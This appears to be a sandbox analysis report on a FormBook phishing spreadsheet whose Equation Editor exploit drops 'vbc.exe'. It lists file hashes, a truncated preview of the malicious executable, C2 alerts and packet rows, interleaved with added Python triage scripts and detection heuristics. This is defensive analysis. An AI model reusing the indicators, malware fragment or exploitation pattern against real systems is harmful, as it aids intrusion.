                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E17CBBC9.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
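Two things worth checking in the Content.MSO listing above: the cache holds each embedded image twice under different names (for example 2A4E0740.png and E17CBBC9.png carry the same SHA-256), and the "Encrypted:true" verdict on 39A93B7B.png is the entropy heuristic reacting to a PNG's deflate stream, not evidence of encryption. The script below is an added example, not part of the sandbox report or of the vendor's tooling: it parses an excerpt of the listing (paths, sizes, entropy and SHA-256 values copied from the report) to group entries by hash, then computes 8-bit Shannon entropy and checks for PNG/JPEG/EMF magic bytes so that high entropy inside a compressed image container is reported as expected rather than suspicious. The 7.9 cut-off in `assess` is an assumption chosen only to match the listed verdicts (7.87 is reported as Encrypted:false, 7.99 as Encrypted:true); the noise PNG is constructed in code.

```python
import math
import random
import struct
import zlib
from collections import defaultdict

# Constructed excerpt: the path, File Type, Size, Entropy, Encrypted and SHA-256
# fields of three entries from the listing above, copied from the report.
REPORT_EXCERPT = r"""
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A4E0740.png
File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Size (bytes):6815
Entropy (8bit):7.871668067811304
Encrypted:false
SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39A93B7B.png
File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Size (bytes):49744
Entropy (8bit):7.99056926749243
Encrypted:true
SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E17CBBC9.png
File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Size (bytes):6815
Entropy (8bit):7.871668067811304
Encrypted:false
SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
"""

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def parse_records(text):
    """Turn the 'Key:Value' lines of the listing into one dict per dropped file."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("C:\\"):          # a new entry starts with its path
            current = {"path": line}
            records.append(current)
        elif current is not None and ":" in line:
            key, value = line.split(":", 1)
            current[key.strip()] = value.strip()
    return records


def group_by_sha256(records):
    """Map each SHA-256 to the cache file names that carry those exact bytes."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["SHA-256"]].append(rec["path"].rsplit("\\", 1)[-1])
    return dict(groups)


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def container_type(data):
    """Recognise the compressed image containers that appear in the listing."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    # EMF: EMR_HEADER record type 1, then the ' EMF' signature at offset 40
    if len(data) >= 44 and data[:4] == b"\x01\x00\x00\x00" and data[40:44] == b" EMF":
        return "emf"
    return None


def assess(data, threshold=7.9):
    """Return (entropy, container, verdict); the threshold is an assumed cut-off."""
    h = shannon_entropy(data)
    kind = container_type(data)
    if h < threshold:
        verdict = "low-entropy"
    elif kind:
        verdict = "high-entropy-compressed-image"   # expected for PNG/JPEG data
    else:
        verdict = "high-entropy-unexplained"        # worth a closer look
    return h, kind, verdict


def _chunk(tag, payload):
    body = tag + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def synthetic_png(seed=1234, width=64, height=200):
    """Constructed test input: a well-formed RGB PNG whose pixels are noise."""
    rng = random.Random(seed)
    raw = b"".join(b"\x00" + bytes(rng.getrandbits(8) for _ in range(3 * width))
                   for _ in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


if __name__ == "__main__":
    for digest, names in group_by_sha256(parse_records(REPORT_EXCERPT)).items():
        print(digest[:16], "->", ", ".join(names))
    print("synthetic PNG:", assess(synthetic_png()))
    print("zero bytes   :", assess(bytes(1000)))
```

Run against the real cache files, the same grouping tells you which images the lure workbook actually embedded once the duplicate cache copies are collapsed, and the preview bytes still carry useful detail: the 613 x 80 PNG above contains a `tEXtSoftware` chunk naming gnome-screenshot, i.e. the decoy graphic was captured on a Linux desktop before being pasted into the spreadsheet.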
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED48C3DC.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):7788
                                              Entropy (8bit):5.5374935868044926
                                              Encrypted:false
                                              SSDEEP:96:wQ2CHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wdTrZuloOSGZboS/C93n+KuI
                                              MD5:4FC415C6424FF953F66A5D5E8BDEC1CA
                                              SHA1:DBB592681E36BB66D6FB8715CF9AFC38E4E73944
                                              SHA-256:AEADE713C14333879F98061E55CF9AF0C211A279A66601DA979D00D41FEFF6EA
                                              SHA-512:40225FAA118A318C4B53D74E5C4B1C6373CD95726DEB8A6FCFD81517B781C43C97B1410089DABDD51E04612921EA4B5DD6094168483233474C94F64EE78CA431
                                              Malicious:false
                                              Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................;.6.).X.......d.......................@.....p....\.....................p........<5.u..p....`.p`m;.$y.w..D................w..D.$.......d.......$....^.p.....^.p..D...D...C.....-........<.w................<.9u.Z.v....X.a....`m;........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F219DE41.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\Desktop\~$(RFQ) No.109050.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):330
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............jM... ...`....@.. ....................................@..................................M..O....`...............................L............................................... ............... ..H............text...p-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................LM......H........?..._......o.......P...........................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..
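The dropped-file records above can be triaged mechanically rather than by eye. The Python below is an added example, not part of this report and not Joe Sandbox tooling: it classifies each record by the writing process, the file's magic bytes and its location, and separates the one record that matters (EQNEDT32.EXE writing a PE into C:\Users\Public) from Excel's own render-cache images and its ~$ owner file. The records are constructed from the entries above; the rule names, the severities, the EMF header padding and the leading byte assumed for the owner file are the example's own.

```python
"""Triage the dropped-file records of an Office sandbox run.

Added example for this report, not Joe Sandbox's own code. The records
below are constructed from the dropped-file entries above (path, writing
process, size and the leading bytes the preview shows); the rule names,
severities and magic-byte checks are this example's own.
"""
from __future__ import annotations

from dataclasses import dataclass
from pathlib import PureWindowsPath

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
CACHE = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO"


@dataclass(frozen=True)
class DroppedFile:
    path: str       # where the file landed
    process: str    # image path of the process that wrote it
    size: int       # bytes on disk
    head: bytes     # leading bytes, enough for the magic checks below


# Constructed from the entries above. The EMF head is padded so the " EMF"
# signature sits at offset 40 as in a real EMR_HEADER; the owner file's
# leading length byte is assumed.
RECORDS = [
    DroppedFile(CACHE + r"\ED48C3DC.emf", EXCEL, 7788,
                b"\x01\x00\x00\x00\x6c\x00\x00\x00" + b"\x00" * 32 + b" EMF"),
    DroppedFile(CACHE + r"\F219DE41.png", EXCEL, 33795,
                b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    DroppedFile(r"C:\Users\user\Desktop\~$(RFQ) No.109050.xlsx", EXCEL, 330,
                b"\x04user"),
    DroppedFile(r"C:\Users\Public\vbc.exe", EQNEDT, 538624, b"MZ\x90\x00\x03\x00"),
]


def content_kind(head: bytes) -> str:
    """Classify by magic bytes, not extension: the dropper chooses the
    name, the loader only cares about the bytes."""
    if head[:2] == b"MZ":
        return "pe"
    if head[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if len(head) >= 44 and head[40:44] == b" EMF":   # EMR_HEADER.dSignature
        return "emf"
    return "other"


def writer_name(process: str) -> str:
    return PureWindowsPath(process).name.lower()


def user_writable(path: str) -> bool:
    """True for locations any interactive user can write without elevation."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return len(parts) > 1 and parts[1] in {"users", "programdata"}


def triage(f: DroppedFile) -> tuple[str, str]:
    """Return (severity, rule) for one dropped-file record."""
    writer = writer_name(f.process)
    kind = content_kind(f.head)
    name = PureWindowsPath(f.path).name
    lowered = f.path.lower()

    # The Equation Editor is a legacy renderer with no business writing
    # files at all; an executable from it is the CVE-2017-11882 /
    # CVE-2018-0802 exploitation pattern.
    if writer == EQUATION_EDITOR:
        return ("critical" if kind == "pe" else "high", "equation-editor-wrote-file")
    if writer in OFFICE_HOSTS and kind == "pe":
        return ("high", "office-wrote-pe")
    # Office owner/lock file: it records who has the workbook open (the
    # preview above shows the user name) and is not a payload, even when a
    # sandbox inherits the sample's verdict for it because of the name.
    if writer in OFFICE_HOSTS and name.startswith("~$") and f.size < 1024:
        return ("info", "office-owner-lock-file")
    # Office renders embedded pictures into Content.MSO while showing the
    # document; the picture is the lure, not the payload.
    if writer in OFFICE_HOSTS and "\\content.mso\\" in lowered and kind in {"png", "emf"}:
        return ("info", "office-render-cache")
    if kind == "pe" and user_writable(f.path):
        return ("medium", "pe-in-user-writable-path")
    return ("low", "review")


def triage_all(records: list[DroppedFile]) -> dict[str, tuple[str, str]]:
    """Map each record's file name to its (severity, rule)."""
    return {PureWindowsPath(r.path).name: triage(r) for r in records}


if __name__ == "__main__":
    for name, (sev, rule) in triage_all(RECORDS).items():
        print(f"{sev:<8} {rule:<28} {name}")
```

The same rules apply unchanged to a Sysmon FileCreate (event 11) feed once you can read the first few bytes of the created file; the point of keying on the writer and the magic bytes, rather than on the .exe extension or the sandbox's verdict column, is that it keeps firing when the dropper renames the payload and stays quiet for Excel's lock and cache files.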

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.987872651324991
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:(RFQ) No.109050.xlsx
                                              File size:596992
                                              MD5:34cc835409afb805f20b811796d3b1fd
                                              SHA1:90b0fe9c48bb9915e2202e905baa3029ebc6f541
                                              SHA256:bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
                                              SHA512:e9d0366bf5beceead9fa2c1a6895ab9a74a214a9fded46ce1021e1254c6eafb4c6db3c0d55eae94896edbe41de02aa9e7bf76f1dcfa0cd092de4b544c0bb1ac1
                                              SSDEEP:12288:lm/+veTAqlDk+dodQ9TdIXpyXngu5RR7dc4/uwUR+A4hFYSAj542ds4Ca6:02eTA6fw2dTXngu5RR7hA4rTg4264L6
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Network Behavior

                                              Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
09/15/21-11:43:28.657859  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49167        80         192.168.2.22    34.102.136.180
09/15/21-11:43:28.657859  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49167        80         192.168.2.22    34.102.136.180
09/15/21-11:43:28.657859  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49167        80         192.168.2.22    34.102.136.180
09/15/21-11:43:28.772925  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49167      34.102.136.180  192.168.2.22
09/15/21-11:43:39.395982  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49169      34.98.99.30     192.168.2.22
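The Snort alerts only become useful once they are joined onto the flows they fired on. The Python below is an added example, not Joe Sandbox code: it orients each packet by which end is the sandbox (192.168.2.22, as the alert rows show), groups packets into flows, attaches alerts by flow and ranks each remote host. The alert rows are constructed from the table above; the packet rows are the first 14 of the 198.12.84.109 session plus two hypothetical rows standing in for the port-49167 check-in the alerts describe; the verdict names and the inbound-ratio heuristic are the example's own.

```python
"""Correlate a sandbox report's Snort alerts with its TCP packet list.

Added example for this report, not Joe Sandbox's own tooling. Both record
sets are constructed from the tables above with '|' separating the fields
(so the message text, which contains spaces, survives splitting). The
sandbox host 192.168.2.22 is taken from the alert rows; the verdict names
and the inbound-ratio heuristic are this example's own.
"""
from __future__ import annotations

from dataclasses import dataclass, field

SANDBOX_IP = "192.168.2.22"

# Constructed from the "Snort IDS Alerts" table above:
# timestamp|protocol|sid|message|src port|dst port|src ip|dst ip
SNORT_ALERTS = """\
09/15/21-11:43:28.657859|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49167|80|192.168.2.22|34.102.136.180
09/15/21-11:43:28.657859|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49167|80|192.168.2.22|34.102.136.180
09/15/21-11:43:28.657859|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49167|80|192.168.2.22|34.102.136.180
09/15/21-11:43:28.772925|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49167|34.102.136.180|192.168.2.22
09/15/21-11:43:39.395982|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49169|34.98.99.30|192.168.2.22
"""

# Constructed: the first 14 rows of the 198.12.84.109 session from the
# "TCP Packets" table, plus two hypothetical rows standing in for the
# port-49167 check-in the alerts refer to, so the join has packets to land on.
# timestamp|src port|dst port|src ip|dst ip
TCP_PACKETS = """\
Sep 15, 2021 11:41:57.230140924 CEST|49165|80|192.168.2.22|198.12.84.109
Sep 15, 2021 11:41:57.401886940 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.401978970 CEST|49165|80|192.168.2.22|198.12.84.109
Sep 15, 2021 11:41:57.402611017 CEST|49165|80|192.168.2.22|198.12.84.109
Sep 15, 2021 11:41:57.576512098 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.576544046 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.576561928 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.576575994 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.576673985 CEST|49165|80|192.168.2.22|198.12.84.109
Sep 15, 2021 11:41:57.751707077 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.751804113 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.751828909 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.751878023 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:41:57.751900911 CEST|80|49165|198.12.84.109|192.168.2.22
Sep 15, 2021 11:43:28.600000000 CEST|49167|80|192.168.2.22|34.102.136.180
Sep 15, 2021 11:43:28.772925000 CEST|80|49167|34.102.136.180|192.168.2.22
"""

FlowKey = tuple[str, int, int]   # (remote ip, remote port, sandbox port)


@dataclass
class Flow:
    """One conversation between the sandbox and a remote host."""
    server: str
    server_port: int
    client_port: int
    to_server: int = 0     # packets sandbox -> remote
    from_server: int = 0   # packets remote -> sandbox
    sids: set[int] = field(default_factory=set)
    messages: set[str] = field(default_factory=set)


def orient(src_ip: str, src_port: int, dst_ip: str, dst_port: int) -> tuple[FlowKey, bool]:
    """Return the flow key and True when the packet leaves the sandbox.

    Direction is decided by which end is the sandbox, not by port number,
    so a server answering from port 80 lands in the same flow as the request.
    """
    if src_ip == SANDBOX_IP:
        return (dst_ip, dst_port, src_port), True
    if dst_ip == SANDBOX_IP:
        return (src_ip, src_port, dst_port), False
    raise ValueError(f"neither end is the sandbox: {src_ip} -> {dst_ip}")


def build_flows(packet_text: str) -> dict[FlowKey, Flow]:
    flows: dict[FlowKey, Flow] = {}
    for line in filter(None, packet_text.splitlines()):
        _ts, sport, dport, sip, dip = line.split("|")
        key, outbound = orient(sip, int(sport), dip, int(dport))
        flow = flows.setdefault(key, Flow(*key))
        if outbound:
            flow.to_server += 1
        else:
            flow.from_server += 1
    return flows


def attach_alerts(flows: dict[FlowKey, Flow], alert_text: str) -> None:
    """Join each alert onto its flow. An alert whose packets are not in the
    capture still gets an empty flow, so it is reported rather than lost."""
    for line in filter(None, alert_text.splitlines()):
        _ts, _proto, sid, msg, sport, dport, sip, dip = line.split("|")
        key, _ = orient(sip, int(sport), dip, int(dport))
        flow = flows.setdefault(key, Flow(*key))
        flow.sids.add(int(sid))
        flow.messages.add(msg)


def verdict(flow: Flow) -> str:
    """Rank a flow on the IDS evidence attached to it.

    A family rule on the request decides on its own. The server's answer is
    weak evidence either way: an ATTACK-RESPONSES 403 on the check-in does
    not clear the host (see the note after the code).
    """
    if any(m.startswith("ET TROJAN") for m in flow.messages):
        return "c2-checkin"
    if any(m.startswith("ATTACK-RESPONSES") for m in flow.messages):
        return "server-error-only"
    # Heuristic, this example's own: a remote host that sent more than twice
    # what it received and tripped no rule looks like a download; review it.
    if flow.from_server > 2 * max(flow.to_server, 1):
        return "inbound-heavy-no-alert"
    return "no-alert"


def triage(packet_text: str, alert_text: str) -> dict[str, str]:
    """Map 'remote_ip:port' to a verdict for a whole capture."""
    flows = build_flows(packet_text)
    attach_alerts(flows, alert_text)
    return {f"{f.server}:{f.server_port}": verdict(f) for f in flows.values()}


if __name__ == "__main__":
    flows = build_flows(TCP_PACKETS)
    attach_alerts(flows, SNORT_ALERTS)
    for f in sorted(flows.values(), key=lambda x: x.client_port):
        print(f"{f.server}:{f.server_port} via :{f.client_port}  out={f.to_server} "
              f"in={f.from_server}  sids={sorted(f.sids)}  {verdict(f)}")
```

A 403 from the check-in target is not exculpatory. FormBook samples carry a list of decoy domains next to the live C2 and contact them all, so several hosts answering with an HTTP error is the expected shape of the traffic (family behaviour, not something this report states); the rule hit on the request is the indicator, which is why the three ET TROJAN SIDs outrank the 1201 response alert on the same flow. To run the same join over another report, change SANDBOX_IP and feed it that report's rows.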

                                              Network Port Distribution

                                              TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Sep 15, 2021 11:41:57.230140924 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.401886940 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.401978970 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.402611017 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.576512098 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.576544046 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.576561928 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.576575994 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.576673985 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.751707077 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751804113 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751828909 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751878023 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751900911 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751923084 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751945019 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751966000 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.751998901 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.752055883 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.752060890 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923682928 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923718929 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923741102 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923765898 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923780918 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923789024 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923810005 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923824072 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923837900 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923846006 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923856020 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923857927 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923876047 CEST  49165        80         192.168.2.22   198.12.84.109
